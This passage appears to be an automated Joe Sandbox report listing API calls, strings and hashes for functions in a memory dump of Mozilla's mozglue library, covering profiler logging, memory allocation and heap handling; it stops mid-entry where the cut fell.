                                              • Opcode ID: 4a8a80ff7c8917077151e0c3ae9c994b01b6bce3e26732a14af271aaffab85b5
                                              • Instruction ID: 8bed4f6071856c53e47f1e0be305872636ec0c43e1ada593b66a03633894845c
                                              • Opcode Fuzzy Hash: 4a8a80ff7c8917077151e0c3ae9c994b01b6bce3e26732a14af271aaffab85b5
                                              • Instruction Fuzzy Hash: 6F41C575B00205DBDF00EFA9DDA4E9A7BB4EB89319F028228ED16D7740D734B815CBA5
                                              APIs
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                                • Part of subcall function 6C509420: __Init_thread_footer.LIBCMT ref: 6C50949F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C510039
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C510041
                                              • GetCurrentThreadId.KERNEL32 ref: 6C510075
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C510082
                                              • moz_xmalloc.MOZGLUE(00000048), ref: 6C510090
                                              • free.MOZGLUE(?), ref: 6C510104
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C51011B
                                              Strings
                                              • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C51005B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                              • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                              • API String ID: 3012294017-637075127
                                              • Opcode ID: 2e6377df37310e7e330bf1ef6d1e9efe20bdb1062db77a6f80c1b332a8cae583
                                              • Instruction ID: e86e95fa2f1e34055a6e5514d58e161bb2439dd1220d16d410f9edad5c7a5e8f
                                              • Opcode Fuzzy Hash: 2e6377df37310e7e330bf1ef6d1e9efe20bdb1062db77a6f80c1b332a8cae583
                                              • Instruction Fuzzy Hash: 3041AEB5600644DFDB10EF28CC44A9ABBF0FF89328F41861EE95A87B50DB31A815CB95
                                              APIs
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D7EA7
                                              • malloc.MOZGLUE(00000001), ref: 6C4D7EB3
                                                • Part of subcall function 6C4DCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C4DCB49
                                                • Part of subcall function 6C4DCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C4DCBB6
                                              • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C4D7EC4
                                              • mozalloc_abort.MOZGLUE(?), ref: 6C4D7F19
                                              • malloc.MOZGLUE(?), ref: 6C4D7F36
                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D7F4D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                              • String ID: d
                                              • API String ID: 204725295-2564639436
                                              • Opcode ID: 64b95f6606fa29597b3fbd99ebeb5761d819a1ca829c42270e898922e2158f5f
                                              • Instruction ID: fc4eb990104c380549740c37815800bb8ef3ddf339f296940a5c0edfc75ed67e
                                              • Opcode Fuzzy Hash: 64b95f6606fa29597b3fbd99ebeb5761d819a1ca829c42270e898922e2158f5f
                                              • Instruction Fuzzy Hash: C5310761E0425897DB01EB68CC14DFEB778EF96308F069628EC4997712FB70B988C395
                                              APIs
                                              • RtlAllocateHeap.NTDLL ref: 6C4D3EEE
                                              • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C4D3FDC
                                              • RtlAllocateHeap.NTDLL ref: 6C4D4006
                                              • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C4D40A1
                                              • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C4D3CCC), ref: 6C4D40AF
                                              • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C4D3CCC), ref: 6C4D40C2
                                              • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C4D4134
                                              • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C4D3CCC), ref: 6C4D4143
                                              • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C4D3CCC), ref: 6C4D4157
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Free$Heap$StringUnicode$Allocate
                                              • String ID:
                                              • API String ID: 3680524765-0
                                              • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                              • Instruction ID: 5a88c9385943c0ed3034abdb8f18cf54607cf4c20006637910e66c43c3edb3f2
                                              • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                              • Instruction Fuzzy Hash: B5A17EB1A00215CFDB41DF68C890F59B7F5BF48348F2A51A9D909AF742D771E886CBA0
                                              APIs
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C518273), ref: 6C519D65
                                              • free.MOZGLUE(6C518273,?), ref: 6C519D7C
                                              • free.MOZGLUE(?,?), ref: 6C519D92
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C519E0F
                                              • free.MOZGLUE(6C51946B,?,?), ref: 6C519E24
                                              • free.MOZGLUE(?,?,?), ref: 6C519E3A
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C519EC8
                                              • free.MOZGLUE(6C51946B,?,?,?), ref: 6C519EDF
                                              • free.MOZGLUE(?,?,?,?), ref: 6C519EF5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free$StampTimeV01@@Value@mozilla@@
                                              • String ID:
                                              • API String ID: 956590011-0
                                              • Opcode ID: 223dc94bea9e9342585917e86cd77205b1ed38dbbd6c8dd5a453f70fc8f48f00
                                              • Instruction ID: 3033c9147cfc53e86d5cc507cf022993b80ec2a11911a9f9b636dda52ebda1ae
                                              • Opcode Fuzzy Hash: 223dc94bea9e9342585917e86cd77205b1ed38dbbd6c8dd5a453f70fc8f48f00
                                              • Instruction Fuzzy Hash: 137191B0909B419BD712CF18C88096BF3F5FF99315B459A5DE85A9BB01EB30E885CBC1
                                              APIs
                                              • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C51DDCF
                                                • Part of subcall function 6C4FFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4FFA4B
                                                • Part of subcall function 6C5190E0: free.MOZGLUE(?,00000000,?,?,6C51DEDB), ref: 6C5190FF
                                                • Part of subcall function 6C5190E0: free.MOZGLUE(?,00000000,?,?,6C51DEDB), ref: 6C519108
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C51DE0D
                                              • free.MOZGLUE(00000000), ref: 6C51DE41
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C51DE5F
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C51DEA3
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C51DEE9
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C50DEFD,?,6C4D4A68), ref: 6C51DF32
                                                • Part of subcall function 6C51DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C51DB86
                                                • Part of subcall function 6C51DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C51DC0E
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C50DEFD,?,6C4D4A68), ref: 6C51DF65
                                              • free.MOZGLUE(?), ref: 6C51DF80
                                                • Part of subcall function 6C4E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4E5EDB
                                                • Part of subcall function 6C4E5E90: memset.VCRUNTIME140(ewRl,000000E5,?), ref: 6C4E5F27
                                                • Part of subcall function 6C4E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C4E5FB2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                              • String ID:
                                              • API String ID: 112305417-0
                                              • Opcode ID: 1ec8abed1c896bd778600b3cf43870fbade0deeff4fe7e9d844a022599370986
                                              • Instruction ID: b34da7bcf35d3fbb74bbeb0dacf028e4063001abc2b6c6b80ae93a95c0bf853a
                                              • Opcode Fuzzy Hash: 1ec8abed1c896bd778600b3cf43870fbade0deeff4fe7e9d844a022599370986
                                              • Instruction Fuzzy Hash: FF51B7766096009BF722DB18CC886AEB3B2BF95309F96461CD81A53F00D731F959CBD2
                                              APIs
                                              • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C525C8C,?,6C4FE829), ref: 6C525D32
                                              • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C525C8C,?,6C4FE829), ref: 6C525D62
                                              • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C525C8C,?,6C4FE829), ref: 6C525D6D
                                              • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C525C8C,?,6C4FE829), ref: 6C525D84
                                              • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C525C8C,?,6C4FE829), ref: 6C525DA4
                                              • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C525C8C,?,6C4FE829), ref: 6C525DC9
                                              • std::_Facet_Register.LIBCPMT ref: 6C525DDB
                                              • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C525C8C,?,6C4FE829), ref: 6C525E00
                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C525C8C,?,6C4FE829), ref: 6C525E45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                              • String ID:
                                              • API String ID: 2325513730-0
                                              • Opcode ID: 845bf46970bcde1eeacfb5f4c66a9a856d5aeee405959887eb39524b317b783e
                                              • Instruction ID: d42ac759ff069409fcb68321f76d69b3ff3fc59ea9620d292534354e58f2ad9f
                                              • Opcode Fuzzy Hash: 845bf46970bcde1eeacfb5f4c66a9a856d5aeee405959887eb39524b317b783e
                                              • Instruction Fuzzy Hash: 234191707002049FCB04EF69CC98AAE77F5EF89318F8540A9E50A9B791EB34ED05CB65
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C4C31A7), ref: 6C4FCDDD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                              • API String ID: 4275171209-2186867486
                                              • Opcode ID: 56f8165daf60b0fa4d0712f63198930dcae96c3fb83e477bee7bb25d6a914f58
                                              • Instruction ID: 9a90b62a82ea7c70e64b019453de713f663dbf3f08205ce87f68b06deae2236e
                                              • Opcode Fuzzy Hash: 56f8165daf60b0fa4d0712f63198930dcae96c3fb83e477bee7bb25d6a914f58
                                              • Instruction Fuzzy Hash: 0A3192317802056BFF24FE658C45FAE7BB5ABC1759F218015E624ABBC0DB70D50287A5
                                              APIs
                                                • Part of subcall function 6C4CF100: LoadLibraryW.KERNEL32(shell32,?,6C53D020), ref: 6C4CF122
                                                • Part of subcall function 6C4CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C4CF132
                                              • moz_xmalloc.MOZGLUE(00000012), ref: 6C4CED50
                                              • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4CEDAC
                                              • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C4CEDCC
                                              • CreateFileW.KERNEL32 ref: 6C4CEE08
                                              • free.MOZGLUE(00000000), ref: 6C4CEE27
                                              • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C4CEE32
                                                • Part of subcall function 6C4CEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C4CEBB5
                                                • Part of subcall function 6C4CEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C4FD7F3), ref: 6C4CEBC3
                                                • Part of subcall function 6C4CEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C4FD7F3), ref: 6C4CEBD6
                                              Strings
                                              • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C4CEDC1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                              • String ID: \Mozilla\Firefox\SkeletonUILock-
                                              • API String ID: 1980384892-344433685
                                              • Opcode ID: 70b8799a696cb75045381744b1d0bc7a3bdea5bd0e0ec8ce2973e9c2f6392639
                                              • Instruction ID: 1dc273bcb87d0d1f3169077f343eb2da00855306a16b13a26420ed02f160becb
                                              • Opcode Fuzzy Hash: 70b8799a696cb75045381744b1d0bc7a3bdea5bd0e0ec8ce2973e9c2f6392639
                                              • Instruction Fuzzy Hash: CE510275E052148BDB00EF68C882FEEB7B0AF59358F04842DE8556B750E7306949C7E3
                                              APIs
                                              • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C53A565
                                                • Part of subcall function 6C53A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C53A4BE
                                                • Part of subcall function 6C53A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C53A4D6
                                              • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C53A65B
                                              • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C53A6B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                              • String ID: 0$z
                                              • API String ID: 310210123-2584888582
                                              • Opcode ID: 72e86aba4b89709ce09a7cd976542ec60b0109bbbb7260617c3ca24376165ac9
                                              • Instruction ID: 819bfc1560d014b0e720e1de6d7cbf5a8be2e5f8935094c932248688605d38dc
                                              • Opcode Fuzzy Hash: 72e86aba4b89709ce09a7cd976542ec60b0109bbbb7260617c3ca24376165ac9
                                              • Instruction Fuzzy Hash: 87414671A087459FC741DF68C480A8BBBE4BFC9344F409A2EF49987650EB30E649CB82
                                              APIs
                                                • Part of subcall function 6C4FAB89: EnterCriticalSection.KERNEL32(6C54E370,?,?,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB94
                                                • Part of subcall function 6C4FAB89: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FABD1
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                              • __Init_thread_footer.LIBCMT ref: 6C50949F
                                              Strings
                                              • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C50946B
                                              • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C50947D
                                              • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C509459
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                              • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                              • API String ID: 4042361484-1628757462
                                              • Opcode ID: 3a65bbb2a9c56ee8d52ffec7fc908e7a744f3a5d69a0085efb35c8089a57f21a
                                              • Instruction ID: 89c33ceae964db6f3318822ca449b5a80d66766734d9e401668d44f959f70502
                                              • Opcode Fuzzy Hash: 3a65bbb2a9c56ee8d52ffec7fc908e7a744f3a5d69a0085efb35c8089a57f21a
                                              • Instruction Fuzzy Hash: DF018470B0010187D714EB6CDC15A4E33B5AB4636DF068636E90AC6B51EB21E869899F
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C510F6B
                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C510F88
                                              • GetCurrentThreadId.KERNEL32 ref: 6C510FF7
                                              • InitializeConditionVariable.KERNEL32(?), ref: 6C511067
                                              • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C5110A7
                                              • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C51114B
                                                • Part of subcall function 6C508AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C521563), ref: 6C508BD5
                                              • free.MOZGLUE(?), ref: 6C511174
                                              • free.MOZGLUE(?), ref: 6C511186
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                              • String ID:
                                              • API String ID: 2803333873-0
                                              • Opcode ID: 00fd67ac0f88f8fcc898d48798fd8dc518e956cd9901d8cc98e15b27b92d1a00
                                              • Instruction ID: 5bf03944fec7b33dc234ac1caab3ece1483794e51f214308b6ce6f2e30ad8d6b
                                              • Opcode Fuzzy Hash: 00fd67ac0f88f8fcc898d48798fd8dc518e956cd9901d8cc98e15b27b92d1a00
                                              • Instruction Fuzzy Hash: 4361BF75A083409BEB10DF25CC88B9AB7F5BFD5318F05891DE88947B11EB71E859CB82
                                              APIs
                                              • moz_xmalloc.MOZGLUE(?,?,?,?,6C4CB61E,?,?,?,?,?,00000000), ref: 6C4CB6AC
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C4CB61E,?,?,?,?,?,00000000), ref: 6C4CB6D1
                                              • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C4CB61E,?,?,?,?,?,00000000), ref: 6C4CB6E3
                                              • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C4CB61E,?,?,?,?,?,00000000), ref: 6C4CB70B
                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C4CB61E,?,?,?,?,?,00000000), ref: 6C4CB71D
                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C4CB61E), ref: 6C4CB73F
                                              • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C4CB61E,?,?,?,?,?,00000000), ref: 6C4CB760
                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C4CB61E,?,?,?,?,?,00000000), ref: 6C4CB79A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                              • String ID:
                                              • API String ID: 1394714614-0
                                              • Opcode ID: 6974c831f9aae0f18d1bb659fca1099d6300e6ba6b4764ebe3924406e6a62262
                                              • Instruction ID: db7943bb374e9cd42652fbe7ff3535eef5214126d1d42a719d3d60f8db948aca
